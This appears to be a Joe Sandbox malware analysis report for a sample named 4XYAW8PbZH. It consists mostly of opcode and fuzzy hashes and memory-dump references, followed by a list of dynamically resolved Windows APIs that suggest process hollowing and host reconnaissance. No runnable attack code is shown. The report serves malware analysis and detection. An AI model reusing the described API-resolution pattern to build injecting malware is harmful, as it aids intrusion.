                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 3576c8a5fe6d3f1cef846c896aba4a2be75c2c2245aac5312625b5cf373832dd
                                                                                                                                                                                              • Instruction ID: 4e433af5e5593713709d1bf684c70db9608b55ca74aca660601de932e372f8c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3576c8a5fe6d3f1cef846c896aba4a2be75c2c2245aac5312625b5cf373832dd
                                                                                                                                                                                              • Instruction Fuzzy Hash: ECF01575D08204DFCB88CB65C0608ECBBFAEB4E200B069197E41997212D2319501CF20
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 3f194f0014342ad628ff2d091f33667451cbcb55ad9872b2e258aaa2ff58b3c0
                                                                                                                                                                                              • Instruction ID: 4ed9dd286b968b1f43512bee88fc479e57925813a624818e27f0ef7a841acf4a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f194f0014342ad628ff2d091f33667451cbcb55ad9872b2e258aaa2ff58b3c0
                                                                                                                                                                                              • Instruction Fuzzy Hash: B4F0B274906268CFDBA4CF24C854BE9BBB5BB09300F0081D6E48DA7341DA30AE90CF10
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 464dffc4c1078550e90469bf79b1d6f99544950d394f581857d8c52915f84fec
                                                                                                                                                                                              • Instruction ID: 6a40dbd1d9ba7902b392c679c1ab68654e08f8f6d2d4ac4f3e77bc7727f22965
                                                                                                                                                                                              • Opcode Fuzzy Hash: 464dffc4c1078550e90469bf79b1d6f99544950d394f581857d8c52915f84fec
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FF01574E04208ABCB84EFA9D44469DBBF5EB88311F10C0AAA804A3354DA345A54DF41
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 7fbd88c6ac5594feca409b579efc38cc08bcaaa800deed6670516fbba23bcf83
                                                                                                                                                                                              • Instruction ID: 84856921e10fdddf7a588a4a601e729b646f8d821c72db010f49ac1dadfe335e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fbd88c6ac5594feca409b579efc38cc08bcaaa800deed6670516fbba23bcf83
                                                                                                                                                                                              • Instruction Fuzzy Hash: 30F0A574E10219CFFB50DFA0D989BADBAB2EB94200F1081A6A409B7344CB745DC6CF61
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 9490ccff94331b22bc144772599d399aa170affe088515fe7795eed696b10dd5
                                                                                                                                                                                              • Instruction ID: 27fdfacdad8137b02962ede67c1a7a567c4bc43e0dd3cff624474d5e230d1cab
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9490ccff94331b22bc144772599d399aa170affe088515fe7795eed696b10dd5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 87E04FB0D00209DFC740EF79C504A9EBBF0BF08600F1184A6C014E7351E77085058F50
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 493a4897ae2ea7e7e14c8848cd93f5c8c2c6a1146ea99c6c6b9a491f07a8bb18
                                                                                                                                                                                              • Instruction ID: 76bc2404e11decb4b8968319291bf89af68287b49be75f644c66f2f59cb33e85
                                                                                                                                                                                              • Opcode Fuzzy Hash: 493a4897ae2ea7e7e14c8848cd93f5c8c2c6a1146ea99c6c6b9a491f07a8bb18
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FD0A73000D7445FD3571FA4E81D2D5BFB89B02201F410487F0CA825B7DE600954CFB2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5797643ef138610998a594cc94c715792fbc2591241d62f51d114c47d11fde8f
                                                                                                                                                                                              • Instruction ID: da043d980f691d7c91aa9e0be0a972951181c73a9f33bda8e9fd11638e13c8a0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5797643ef138610998a594cc94c715792fbc2591241d62f51d114c47d11fde8f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 64D012362102085E4B40EFD5E810C97B7DDBB25640740C463E544CB220F621F828DB61
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 17d2588b00870c79f9c4902f283de755a559cb2cd2fdccfb550bcf9b86e6f590
                                                                                                                                                                                              • Instruction ID: e23579256c3f7894304f5b76b32aadc87506e997720307e53706f050dd40f551
                                                                                                                                                                                              • Opcode Fuzzy Hash: 17d2588b00870c79f9c4902f283de755a559cb2cd2fdccfb550bcf9b86e6f590
                                                                                                                                                                                              • Instruction Fuzzy Hash: 04D02271C0920ACFEB01EFA4C5601EC7FB9FF202017014212C066DB329E7308903CB61
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4334b8c0adb9157174817e62ed0bd7419fe3cb3b678555608b420e69ca5a8a45
                                                                                                                                                                                              • Instruction ID: 57b84ee0ab0e9563f37acf2f32b7466ea027f152781792069af6e7db21c13d6c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4334b8c0adb9157174817e62ed0bd7419fe3cb3b678555608b420e69ca5a8a45
                                                                                                                                                                                              • Instruction Fuzzy Hash: EEC08C300582049BE2986BA9B40E3E8BEA86705202F00101AB00D419908E705480CB61
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c2ded9eebdd8017a2555f4bcabb25604b7b94fc1d3b755f5578232cffb23d644
                                                                                                                                                                                              • Instruction ID: f95cb349984ea89e35ae104f60a776d5c6d8b85504865b9c08c42b94377808ee
                                                                                                                                                                                              • Opcode Fuzzy Hash: c2ded9eebdd8017a2555f4bcabb25604b7b94fc1d3b755f5578232cffb23d644
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DC08C35A64109CFD700FFA4D6C05EDBFB6EF88300B205112D00AA621CCB308C878B10
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: bff6a903da7b8ab2ad3f40b70ed7cb686579196343db5be2cd87fc2bd185a6c2
                                                                                                                                                                                              • Instruction ID: 0aed70f2ca2f70a79f1c06e5ddd5fb2558ea4825ff7f35af7027f42c0912024b
                                                                                                                                                                                              • Opcode Fuzzy Hash: bff6a903da7b8ab2ad3f40b70ed7cb686579196343db5be2cd87fc2bd185a6c2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AD0123050D2C08FC746CB30CC685E57FA39B0721130A44F7D46D5E867C2A84547CB62
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4|cq$4|cq$$^q
                                                                                                                                                                                              • API String ID: 0-1027864050
                                                                                                                                                                                              • Opcode ID: 4b18401eb84d01eaec2873803ccac4bdc295e60f4f05e49017eae71169d79796
                                                                                                                                                                                              • Instruction ID: 838d64405fa8c5ba0ed392b2e4ca2932accb76d0e4570762c447b9ad13752772
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b18401eb84d01eaec2873803ccac4bdc295e60f4f05e49017eae71169d79796
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BF19E35B441158FCB19EF29C494A3E7BE2AF85700B2944A9E40ADB3B5DB35EC83C791
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: 4'^q$:$pbq$~
                                                                                                                                                                                              • API String ID: 0-999388165
                                                                                                                                                                                              • Opcode ID: 44df86b4964aed5c8558bc9880d772dbe7d8e86e6ef90114c8926bebc21386cf
                                                                                                                                                                                              • Instruction ID: e01dadd04d6c3da8e19be3203a80cf95ce2a229621ff3cd453b33a719b4aa85f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 44df86b4964aed5c8558bc9880d772dbe7d8e86e6ef90114c8926bebc21386cf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B42E375A00219DFDB25CFA9C984ADDBBB2FF48304F1584EAE509AB321DB319991DF10
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: febfb2fdc3a1a93fb70b3ef414e13a4efa8bc2ce9ce6a62b109869b6c347988b
                                                                                                                                                                                              • Instruction ID: dcce9f0b008bb26324daa6796ac4e2b3664971c9835c422de5cf9a7ac383a435
                                                                                                                                                                                              • Opcode Fuzzy Hash: febfb2fdc3a1a93fb70b3ef414e13a4efa8bc2ce9ce6a62b109869b6c347988b
                                                                                                                                                                                              • Instruction Fuzzy Hash: D5E1D974E041198FCB14DFA9C5909AEFBF2FF89304F24816AE415AB35AD731A942CF61
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ff8253c009ed65ec73dc15ce158c9e4613fdc734b9e8d19f2e87240ccd1d2f57
                                                                                                                                                                                              • Instruction ID: 72b7a2af5cd652cdac5fdd122341f754548209069160eb5f822517430558f445
                                                                                                                                                                                              • Opcode Fuzzy Hash: ff8253c009ed65ec73dc15ce158c9e4613fdc734b9e8d19f2e87240ccd1d2f57
                                                                                                                                                                                              • Instruction Fuzzy Hash: 76E1E974E042198FCB14DFA9C5909AEFBF2FF89304F24816AE415AB356D731A941CF61
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 8e61573aee4d29e17bcdd99cb2220fe2ede662c33e11ee3336ed7b1d3ef62534
                                                                                                                                                                                              • Instruction ID: 4c4550bae890fae873e96c4f32f236c11a879ec69b0e8279d61cc1f4cd97d35b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e61573aee4d29e17bcdd99cb2220fe2ede662c33e11ee3336ed7b1d3ef62534
                                                                                                                                                                                              • Instruction Fuzzy Hash: 62E1D974E041198FCB14DFA9C5909AEFBF2FF89304F24816AE415AB35AD731A942CF61
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5761d01e3278c9f7bf312bf0afa6b42e6a3c5a49309a70376d10f6a3e043d69d
                                                                                                                                                                                              • Instruction ID: 7a61dcdaead760cd40b68000ab1583d8254234e083824a2c3deb0156c62cbc8c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5761d01e3278c9f7bf312bf0afa6b42e6a3c5a49309a70376d10f6a3e043d69d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AE1FA74E041199FCB14DFA9C5909AEFBF2FF89304F24816AE815AB356D730A946CF60
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1838499117.00000000054D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_54d0000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
• API String ID:
• Opcode ID: 01ec43695ddc7286dbcceaba2880bf7fab6e6368ace47ab61488cef6412a771e
• Instruction ID: 5ef45fc539c24469acfc0cd4e9d980dda6bb4a8d6242d4d4a45a368b9f2c55c7
• Opcode Fuzzy Hash: 01ec43695ddc7286dbcceaba2880bf7fab6e6368ace47ab61488cef6412a771e
• Instruction Fuzzy Hash: F6E1FB74E041198FCB14DFA9C5909AEFBF2FF89304F24816AE415AB35AD731A941CFA0
Memory Dump Source
• Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: efecc67853a1878b969427e5181d98ebb5cf258fe67ca4c28fb433adf20ca4c1
• Instruction ID: ecfe9d29f3e58969dd8363d8e485aefb50aa417f94fc4f1f856fba80862b9bff
• Opcode Fuzzy Hash: efecc67853a1878b969427e5181d98ebb5cf258fe67ca4c28fb433adf20ca4c1
• Instruction Fuzzy Hash: 3ED1F531D2075A8ADB00EF64D950A99B7B1FFD5300F2087AAE5097B615FB70AAC5CF81
Memory Dump Source
• Source File: 00000000.00000002.1837553178.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4f10000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f30f14cc57e443dfa85c24a1e005b305103d0994b83234e72de9da73a90edcf6
• Instruction ID: 417a597ed4bd2b35e4eb02d5c91472024f3fc8a30dc0390ea9d279b7459918e2
• Opcode Fuzzy Hash: f30f14cc57e443dfa85c24a1e005b305103d0994b83234e72de9da73a90edcf6
• Instruction Fuzzy Hash: 81D1E431D2075A8ADB00EF64D950A99B7B1FF95300F2087AAE5097B615FB70AAC5CF81
Memory Dump Source
• Source File: 00000000.00000002.1831296070.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_df0000_4XYAW8PbZH.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 817c5e493db13cb430847f08da548b1857b3efed8e50fbd8297877ca6f12f02a
• Instruction ID: 4486288bdcf8d41c3df40fa9d0cbacc67f7bf92564e1e2efda513a173eb01357
• Opcode Fuzzy Hash: 817c5e493db13cb430847f08da548b1857b3efed8e50fbd8297877ca6f12f02a
• Instruction Fuzzy Hash: 0DA16F32E0021D8FCF05DFB5D8845AEB7B2FF84300B1A857AE905AB265DB71E955CB60

Execution Graph

Execution Coverage: 1.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2%
Total number of Nodes: 685
Total number of Limit Nodes: 21
execution_graph

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
• GetProcAddress.KERNEL32(00000000), ref: 0041BD11
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
• GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
• GetProcAddress.KERNEL32(00000000), ref: 0041BD40
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
• GetProcAddress.KERNEL32(00000000), ref: 0041BD54
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
• GetProcAddress.KERNEL32(00000000), ref: 0041BD68
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
• GetProcAddress.KERNEL32(00000000), ref: 0041BD78
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
• GetProcAddress.KERNEL32(00000000), ref: 0041BD88
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
• GetProcAddress.KERNEL32(00000000), ref: 0041BD98
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
• GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
• GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
• GetProcAddress.KERNEL32(00000000), ref: 0041BE08
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
• GetProcAddress.KERNEL32(00000000), ref: 0041BE19
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
• GetProcAddress.KERNEL32(00000000), ref: 0041BE29
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
• GetProcAddress.KERNEL32(00000000), ref: 0041BE63
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
• GetProcAddress.KERNEL32(00000000), ref: 0041BE73
Strings
Memory Dump Source
• Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleLibraryLoadModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 384173800-625181639
• Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
• Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE

Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
